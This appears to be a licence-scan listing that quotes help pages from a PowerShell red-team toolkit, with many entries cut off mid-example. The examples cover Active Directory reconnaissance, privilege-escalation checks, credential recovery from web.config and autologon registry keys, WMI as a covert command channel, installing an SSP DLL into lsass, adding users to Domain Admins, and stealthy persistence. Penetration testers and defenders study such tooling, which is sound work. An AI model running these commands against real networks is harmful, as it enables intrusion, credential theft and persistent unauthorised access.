 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-NetSession
 ```
 .
 Returns active sessions on the local host.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-NetSession -ComputerName sqlserver
 ```
 .
 Returns active sessions on the 'sqlserver' host.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 Get-DomainController | Get-NetSession
 ```
 .
 Returns active sessions on all domain controllers.
 .
 ### -------------------------- EXAMPLE 4 --------------------------
 ```

Files:     docs/Recon/Get-WMIRegCachedRDPConnection.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-WMIRegCachedRDPConnection.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-WMIRegCachedRDPConnection [[-ComputerName] <String[]>] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 Uses remote registry functionality to query all entries for the
 "Windows Remote Desktop Connection Client" on a machine, separated by
 user and target server.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-WMIRegCachedRDPConnection
 ```
 .
 Returns the RDP connection client information for the local machine.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-WMIRegCachedRDPConnection  -ComputerName WINDOWS2.testlab.local
 ```
 .
 Returns the RDP connection client information for the WINDOWS2.testlab.local machine
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 Get-DomainComputer | Get-WMIRegCachedRDPConnection
 ```
 .
 Returns cached RDP information for all machines in the domain.
 .
 ### -------------------------- EXAMPLE 4 --------------------------
 ```

Files:     docs/Recon/Get-DomainUser.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-DomainUser.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ### AllowDelegation (Default)
 ```
 Get-DomainUser [[-Identity] <String[]>] [-SPN] [-AdminCount] [-AllowDelegation] [-KerberosPreuthNotRequired]
 [-Domain <String>] [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>] [-Server <String>]
 [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>]
 [-Tombstone] [-FindOne] [-Credential <PSCredential>] [-Raw]
 ```
 .
 ### DisallowDelegation
 ```
 Get-DomainUser [[-Identity] <String[]>] [-SPN] [-AdminCount] [-DisallowDelegation] [-KerberosPreuthNotRequired]
 [-Domain <String>] [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>] [-Server <String>]
 [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>]
 [-Tombstone] [-FindOne] [-Credential <PSCredential>] [-Raw]
 ```
 .
 ## DESCRIPTION
 Builds a directory searcher object using Get-DomainSearcher, builds a custom
 LDAP filter based on targeting/filter parameters, and searches for all objects
 matching the criteria.
 To only return specific properies, use
 "-Properties samaccountname,usnchanged,...".
 By default, all user objects for
 the current domain are returned.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-DomainUser -Domain testlab.local
 ```
 .
 Return all users for the testlab.local domain
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-DomainUser "S-1-5-21-890171859-3433809279-3366196753-1108","administrator"
 ```
 .
 Return the user with the given SID, as well as Administrator.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```

Files:     docs/CodeExecution/Invoke-WmiCommand.md
Copyright: __NO_COPYRIGHT__ in: docs/CodeExecution/Invoke-WmiCommand.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Invoke-WmiCommand [-Payload] <ScriptBlock> [[-RegistryHive] <String>] [[-RegistryKeyPath] <String>]
 [[-RegistryPayloadValueName] <String>] [[-RegistryResultValueName] <String>] [[-ComputerName] <String[]>]
 [[-Credential] <PSCredential>] [[-Impersonation] <ImpersonationLevel>]
 [[-Authentication] <AuthenticationLevel>] [-EnableAllPrivileges] [[-Authority] <String>]
 ```
 .
 ## DESCRIPTION
 Invoke-WmiCommand executes a PowerShell ScriptBlock on a target
 computer using WMI as a pure C2 channel.
 It does this by using the
 StdRegProv WMI registry provider methods to store a payload into a
 registry value.
 The command is then executed on the victim system and
 the output is stored in another registry value that is then retrieved
 remotely.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Invoke-WmiCommand -Payload { if ($True) { 'Do Evil' } } -Credential 'TargetDomain\TargetUser' -ComputerName '10.10.1.1'
 ```
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```

Files:     docs/Recon/Get-DomainUserEvent.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-DomainUserEvent.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-DomainUserEvent [[-ComputerName] <String[]>] [-StartTime <DateTime>] [-EndTime <DateTime>]
 [-MaxEvents <Int32>] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 This function uses an XML path filter passed to Get-WinEvent to retrieve
 security events with IDs of 4624 (logon events) or 4648 (explicit credential
 logon events) from -StartTime (default of now-1 day) to -EndTime (default of now).
 A maximum of -MaxEvents (default of 5000) are returned.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-DomainUserEvent
 ```
 .
 Return logon events on the local machine.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-DomainController | Get-DomainUserEvent -StartTime ([DateTime]::Now.AddDays(-3))
 ```
 .
 Return all logon events from the last 3 days from every domain controller in the current domain.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```

Files:     docs/Persistence/New-ElevatedPersistenceOption.md
Copyright: __NO_COPYRIGHT__ in: docs/Persistence/New-ElevatedPersistenceOption.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ### PermanentWMIAtStartup
 ```
 New-ElevatedPersistenceOption [-PermanentWMI] [-AtStartup]
 ```
 .
 ### PermanentWMIDaily
 ```
 New-ElevatedPersistenceOption [-PermanentWMI] [-Daily] -At <DateTime>
 ```
 .
 ### ScheduledTaskOnIdle
 ```
 New-ElevatedPersistenceOption [-ScheduledTask] [-OnIdle]
 ```
 .
 ### ScheduledTaskAtLogon
 ```
 New-ElevatedPersistenceOption [-ScheduledTask] [-AtLogon]
 ```
 .
 ### ScheduledTaskHourly
 ```
 New-ElevatedPersistenceOption [-ScheduledTask] [-Hourly]
 ```
 .
 ### ScheduledTaskDaily
 ```
 New-ElevatedPersistenceOption [-ScheduledTask] [-Daily] -At <DateTime>
 ```
 .
 ### Registry
 ```
 New-ElevatedPersistenceOption [-Registry] [-AtLogon]
 ```
 .
 ## DESCRIPTION
 New-ElevatedPersistenceOption allows for the configuration of elevated persistence options.
 The output of this function is a required parameter of Add-Persistence.
 Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```

Files:     docs/Recon/Get-DomainDNSZone.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-DomainDNSZone.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-DomainDNSZone [[-Domain] <String>] [-Server <String>] [-Properties <String[]>] [-ResultPageSize <Int32>]
 [-ServerTimeLimit <Int32>] [-FindOne] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 {{Fill in the Description}}
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-DomainDNSZone
 ```
 .
 Retrieves the DNS zones for the current domain.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-DomainDNSZone -Domain dev.testlab.local -Server primary.testlab.local
 ```
 .
 Retrieves the DNS zones for the dev.testlab.local domain, binding to primary.testlab.local.
 .
 ## PARAMETERS
 .
 ### -Domain
 The domain to query for zones, defaults to the current domain.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: 1
 Default value: None
 Accept pipeline input: True (ByValue)
 Accept wildcard characters: False
 ```
 .
 ### -Server
 Specifies an Active Directory server (domain controller) to bind to for the search.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases: DomainController
 .
 Required: False
 Position: Named
 Default value: None
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Properties
 Specifies the properties of the output object to retrieve from the server.
 .
 ```yaml
 Type: String[]
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: None
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -ResultPageSize
 Specifies the PageSize to set for the LDAP searcher object.
 .
 ```yaml
 Type: Int32
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: 200
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -ServerTimeLimit
 Specifies the maximum amount of time the server spends searching.
 Default of 120 seconds.
 .
 ```yaml
 Type: Int32
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: 0
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -FindOne
 Only return one result object.
 .
 ```yaml
 Type: SwitchParameter
 Parameter Sets: (All)
 Aliases: ReturnOne
 .
 Required: False
 Position: Named
 Default value: False
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Credential
 A \[Management.Automation.PSCredential\] object of alternate credentials
 for connection to the target domain.
 .
 ```yaml
 Type: PSCredential
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: [Management.Automation.PSCredential]::Empty
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ### PowerView.DNSZone
 .
 Outputs custom PSObjects with detailed information about the DNS zone.
 .
 ## NOTES
 .
 ## RELATED LINKS

Files:     docs/Persistence/Install-SSP.md
Copyright: __NO_COPYRIGHT__ in: docs/Persistence/Install-SSP.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Install-SSP [[-Path] <String>]
 ```
 .
 ## DESCRIPTION
 Install-SSP installs an SSP dll.
 Installation involves copying the dll to
 %windir%\System32 and adding the name of the dll to
 HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Install-SSP -Path .\mimilib.dll
 ```
 .
 ## PARAMETERS
 .
 ### -Path
 {{Fill Path Description}}
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: 1
 Default value: None
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ## NOTES
 The SSP dll must match the OS architecture.
 i.e.
 You must have a 64-bit SSP dll
 if you are running a 64-bit OS.
 In order for the SSP dll to be loaded properly
 into lsass, the dll must export SpLsaModeInitialize.
 .
 ## RELATED LINKS

Files:     docs/Recon/Set-DomainUserPassword.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Set-DomainUserPassword.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Set-DomainUserPassword [-Identity] <String> -AccountPassword <SecureString> [-Domain <String>]
 [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 First binds to the specified domain context using Get-PrincipalContext.
 The bound domain context is then used to search for the specified user -Identity,
 which returns a DirectoryServices.AccountManagement.UserPrincipal object.
 The
 SetPassword() function is then invoked on the user, setting the password to -AccountPassword.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```

Files:     docs/Recon/Get-ForestGlobalCatalog.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-ForestGlobalCatalog.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-ForestGlobalCatalog [[-Forest] <String>] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 Returns all global catalogs for the current forest or the forest specified
 by -Forest X by using Get-Forest to retrieve the specified forest object
 and the .FindAllGlobalCatalogs() to enumerate the global catalogs.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-ForestGlobalCatalog
 ```
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```

Files:     docs/Privesc/Get-WebConfig.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Get-WebConfig.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-WebConfig
 ```
 .
 ## DESCRIPTION
 This script will identify all of the web.config files on the system and recover the
 connection strings used to support authentication to backend databases.
 If needed, the
 script will also decrypt the connection strings on the fly.
 The output supports the
 pipeline which can be used to convert all of the results into a pretty table by piping
 to format-table.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Return a list of cleartext and decrypted connect strings from web.config files.
 ```
 .
 Get-WebConfig
 .
 user   : s1admin
 pass   : s1password
 dbserv : 192.168.1.103\server1
 vdir   : C:\test2
 path   : C:\test2\web.config
 encr   : No
 .
 user   : s1user
 pass   : s1password
 dbserv : 192.168.1.103\server1
 vdir   : C:\inetpub\wwwroot
 path   : C:\inetpub\wwwroot\web.config
 encr   : Yes
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Return a list of clear text and decrypted connect strings from web.config files.
 ```
 .
 Get-WebConfig | Format-Table -Autosize
 .
 user    pass       dbserv                vdir               path                          encr

Files:     docs/Privesc/Test-ServiceDaclPermission.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Test-ServiceDaclPermission.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Test-ServiceDaclPermission [-Name] <String[]> [-Permissions <String[]>] [-PermissionSet <String>]
 ```
 .
 ## DESCRIPTION
 Takes a service Name or a ServiceProcess.ServiceController on the pipeline, and first adds
 a service Dacl to the service object with Add-ServiceDacl.
 All group SIDs for the current
 user are enumerated services where the user has some type of permission are filtered.
 The
 services are then filtered against a specified set of permissions, and services where the
 current user have the specified permissions are returned.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-Service | Test-ServiceDaclPermission
 ```
 .
 Return all service objects where the current user can modify the service configuration.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-Service | Test-ServiceDaclPermission -PermissionSet 'Restart'
 ```
 .
 Return all service objects that the current user can restart.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 Test-ServiceDaclPermission -Permissions 'Start' -Name 'VulnSVC'
 ```
 .
 Return the VulnSVC object if the current user has start permissions.
 .
 ## PARAMETERS
 .
 ### -Name
 An array of one or more service names to test against the specified permission set.
 .
 ```yaml
 Type: String[]
 Parameter Sets: (All)
 Aliases: ServiceName, Service
 .
 Required: True
 Position: 1
 Default value: None
 Accept pipeline input: True (ByPropertyName, ByValue)
 Accept wildcard characters: False
 ```
 .
 ### -Permissions
 A manual set of permission to test again.
 One of:'QueryConfig', 'ChangeConfig', 'QueryStatus',
 'EnumerateDependents', 'Start', 'Stop', 'PauseContinue', 'Interrogate', UserDefinedControl',
 'Delete', 'ReadControl', 'WriteDac', 'WriteOwner', 'Synchronize', 'AccessSystemSecurity',
 'GenericAll', 'GenericExecute', 'GenericWrite', 'GenericRead', 'AllAccess'
 .
 ```yaml
 Type: String[]
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: None
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -PermissionSet
 A pre-defined permission set to test a specified service against.
 'ChangeConfig', 'Restart', or 'AllAccess'.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: ChangeConfig
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ### ServiceProcess.ServiceController
 .
 ## NOTES
 .
 ## RELATED LINKS
 .
 [https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/)

Files:     docs/Recon/Find-LocalAdminAccess.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Find-LocalAdminAccess.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Find-LocalAdminAccess [[-ComputerName] <String[]>] [-ComputerDomain <String>] [-ComputerLDAPFilter <String>]
 [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>]
 [-ComputerSiteName <String>] [-CheckShareAccess] [-Server <String>] [-SearchScope <String>]
 [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
 [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
 ```
 .
 ## DESCRIPTION
 This function enumerates all machines on the current (or specified) domain
 using Get-DomainComputer, and for each computer it checks if the current user
 has local administrator access using Test-AdminAccess.
 If -Credential is passed,
 then Invoke-UserImpersonation is used to impersonate the specified user
 before enumeration, reverting after with Invoke-RevertToSelf.

Files:     docs/Recon/Add-DomainGroupMember.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Add-DomainGroupMember.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Add-DomainGroupMember [-Identity] <String> -Members <String[]> [-Domain <String>] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 First binds to the specified domain context using Get-PrincipalContext.
 The bound domain context is then used to search for the specified -GroupIdentity,
 which returns a DirectoryServices.AccountManagement.GroupPrincipal object.
 For
 each entry in -Members, each member identity is similarly searched for and added
 to the group.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'
 ```
 .
 Adds harmj0y to 'Domain Admins' in the current domain.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```

Files:     docs/Recon/Find-DomainShare.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Find-DomainShare.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Find-DomainShare [[-ComputerName] <String[]>] [-ComputerDomain <String>] [-ComputerLDAPFilter <String>]
 [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>]
 [-ComputerSiteName <String>] [-CheckShareAccess] [-Server <String>] [-SearchScope <String>]
 [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
 [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
 ```
 .
 ## DESCRIPTION
 This function enumerates all machines on the current (or specified) domain
 using Get-DomainComputer, and enumerates the available shares for each
 machine with Get-NetShare.
 If -CheckShareAccess is passed, then
 .
 access to the given share.
 If -Credential is passed, then
 Invoke-UserImpersonation is used to impersonate the specified user before
 enumeration, reverting after with Invoke-RevertToSelf.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Find-DomainShare
 ```
 .
 Find all domain shares in the current domain.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Find-DomainShare -CheckShareAccess
 ```
 .
 Find all domain shares in the current domain that the current user has
 read access to.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```

Files:     docs/Privesc/Get-ModifiableService.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Get-ModifiableService.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-ModifiableService
 ```
 .
 ## DESCRIPTION
 Enumerates all services using Get-Service and uses Test-ServiceDaclPermission to test if
 the current user has rights to change the service configuration.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-ModifiableService
 ```
 .
 Get a set of potentially exploitable services.
 .
 ## PARAMETERS
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ### PowerUp.ModifiablePath
 .
 ## NOTES
 .
 ## RELATED LINKS

Files:     docs/Recon/Get-Domain.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-Domain.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-Domain [[-Domain] <String>] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 Returns a System.DirectoryServices.ActiveDirectory.Domain object for the current
 domain or the domain specified with -Domain X.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-Domain -Domain testlab.local
 ```
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```

Files:     docs/Recon/Get-DomainPolicy.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-DomainPolicy.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-DomainPolicy [[-Domain] <String>] [-Source <String>] [-Server <String>] [-ServerTimeLimit <Int32>]
 [-ResolveSids] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 Returns the default domain policy or the domain controller policy for the current
 domain or a specified domain/domain controller using Get-DomainGPO.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-DomainPolicy
 ```
 .
 Returns the domain policy for the current domain.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-DomainPolicy -Domain dev.testlab.local
 ```
 .
 Returns the domain policy for the dev.testlab.local domain.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 Get-DomainPolicy -Source DC -Domain dev.testlab.local
 ```
 .
 Returns the policy for the dev.testlab.local domain controller.
 .
 ### -------------------------- EXAMPLE 4 --------------------------
 ```

Files:     docs/Recon/Get-Forest.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-Forest.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-Forest [[-Forest] <String>] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 Returns a System.DirectoryServices.ActiveDirectory.Forest object for the current
 forest or the forest specified with -Forest X.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-Forest -Forest external.domain
 ```
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```

Files:     docs/Recon/Get-NetShare.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-NetShare.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-NetShare [[-ComputerName] <String[]>] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 This function will execute the NetShareEnum Win32API call to query
 a given host for open shares.
 This is a replacement for "net share \\\\hostname".
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-NetShare
 ```
 .
 Returns active shares on the local host.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-NetShare -ComputerName sqlserver
 ```
 .
 Returns active shares on the 'sqlserver' host
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 Get-DomainComputer | Get-NetShare
 ```
 .
 Returns all shares for all computers in the domain.
 .
 ### -------------------------- EXAMPLE 4 --------------------------
 ```

Files:     docs/Privesc/Get-ModifiableServiceFile.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Get-ModifiableServiceFile.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-ModifiableServiceFile
 ```
 .
 ## DESCRIPTION

Files:     docs/Recon/Get-RegLoggedOn.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-RegLoggedOn.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-RegLoggedOn [[-ComputerName] <String[]>]
 ```
 .
 ## DESCRIPTION
 This function will query the HKU registry values to retrieve the local
 logged on users SID and then attempt and reverse it.
 Adapted technique from Sysinternal's PSLoggedOn script.
 Benefit over
 using the NetWkstaUserEnum API (Get-NetLoggedon) of less user privileges
 required (NetWkstaUserEnum requires remote admin access).
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-RegLoggedOn
 ```
 .
 Returns users actively logged onto the local host.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-RegLoggedOn -ComputerName sqlserver
 ```
 .
 Returns users actively logged onto the 'sqlserver' host.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 Get-DomainController | Get-RegLoggedOn
 ```
 .
 Returns users actively logged on all domain controllers.
 .
 ### -------------------------- EXAMPLE 4 --------------------------
 ```

Files:     docs/ScriptModification/Remove-Comment.md
Copyright: __NO_COPYRIGHT__ in: docs/ScriptModification/Remove-Comment.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ### FilePath (Default)
 ```
 Remove-Comment [-Path] <String>
 ```
 .
 ### ScriptBlock
 ```
 Remove-Comment [-ScriptBlock] <ScriptBlock>
 ```
 .
 ## DESCRIPTION
 Remove-Comment strips out comments and unnecessary whitespace from a script.
 This is best used in conjunction with Out-EncodedCommand when the size of the script to be encoded might be too big.
 .
 A major portion of this code was taken from the Lee Holmes' Show-ColorizedContent script.
 You rock, Lee!
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```

Files:     docs/Privesc/Get-RegistryAutoLogon.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Get-RegistryAutoLogon.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-RegistryAutoLogon
 ```
 .
 ## DESCRIPTION
 Checks if any autologon accounts/credentials are set in a number of registry locations.
 If they are, the credentials are extracted and returned as a custom PSObject.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-RegistryAutoLogon
 ```
 .
 Finds any autologon credentials left in the registry.
 .
 ## PARAMETERS
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ### PowerUp.RegistryAutoLogon
 .
 Custom PSObject containing autologin credentials found in the registry.
 .
 ## NOTES
 .
 ## RELATED LINKS

Files:     docs/Privesc/Get-ProcessTokenPrivilege.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Get-ProcessTokenPrivilege.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-ProcessTokenPrivilege [[-Id] <UInt32>] [-Special]
 ```
 .
 ## DESCRIPTION
 First, if a process ID is passed, then the process is opened using OpenProcess(),
 otherwise GetCurrentProcess() is used to open up a pseudohandle to the current process.
 OpenProcessToken() is then used to get a handle to the specified process token.
 The token
 is then passed to Get-TokenInformation to query the current privileges for the specified
 token.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-ProcessTokenPrivilege
 ```
 .
 Privilege                    Attributes                     ProcessId

Files:     docs/Recon/Get-DomainComputer.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-DomainComputer.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-DomainComputer [[-Identity] <String[]>] [-Unconstrained] [-TrustedToAuth] [-Printers] [-SPN <String>]
 [-OperatingSystem <String>] [-ServicePack <String>] [-SiteName <String>] [-Ping] [-Domain <String>]
 [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>] [-Server <String>]
 [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>]
 [-Tombstone] [-FindOne] [-Credential <PSCredential>] [-Raw]
 ```
 .
 ## DESCRIPTION
 Builds a directory searcher object using Get-DomainSearcher, builds a custom
 LDAP filter based on targeting/filter parameters, and searches for all objects
 matching the criteria.
 To only return specific properies, use
 "-Properties samaccountname,usnchanged,...".
 By default, all computer objects for
 the current domain are returned.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-DomainComputer
 ```
 .
 Returns the current computers in current domain.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-DomainComputer -SPN mssql* -Domain testlab.local
 ```
 .
 Returns all MS SQL servers in the testlab.local domain.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```

Files:     docs/Privesc/Get-RegistryAlwaysInstallElevated.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Get-RegistryAlwaysInstallElevated.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-RegistryAlwaysInstallElevated
 ```
 .
 ## DESCRIPTION
 Returns $True if the HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
 or the HKCU:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated keys
 are set, $False otherwise.
 If one of these keys are set, then all .MSI files run with
 elevated permissions, regardless of current user permissions.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-RegistryAlwaysInstallElevated
 ```
 .
 Returns $True if any of the AlwaysInstallElevated registry keys are set.
 .
 ## PARAMETERS
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ### System.Boolean
 .
 $True if RegistryAlwaysInstallElevated is set, $False otherwise.
 .
 ## NOTES
 .
 ## RELATED LINKS

Files:     Exfiltration/Get-TimedScreenshot.ps1
Copyright: __NO_COPYRIGHT__ in: Exfiltration/Get-TimedScreenshot.ps1
License:   __UNKNOWN__
 .DESCRIPTION
 .
 A function that takes screenshots and saves them to a folder.
 .
 .PARAMETER Path
 .
 Specifies the folder path.
 .
 .PARAMETER Interval
 .
 Specifies the interval in seconds between taking screenshots.
 .
 .PARAMETER EndTime
 .
 Specifies when the script should stop running in the format HH-MM
 .
 .EXAMPLE
 .
 PS C:\> Get-TimedScreenshot -Path c:\temp\ -Interval 30 -EndTime 14:00
 .
 .LINK
 .
 http://obscuresecurity.blogspot.com/2013/01/Get-TimedScreenshot.html
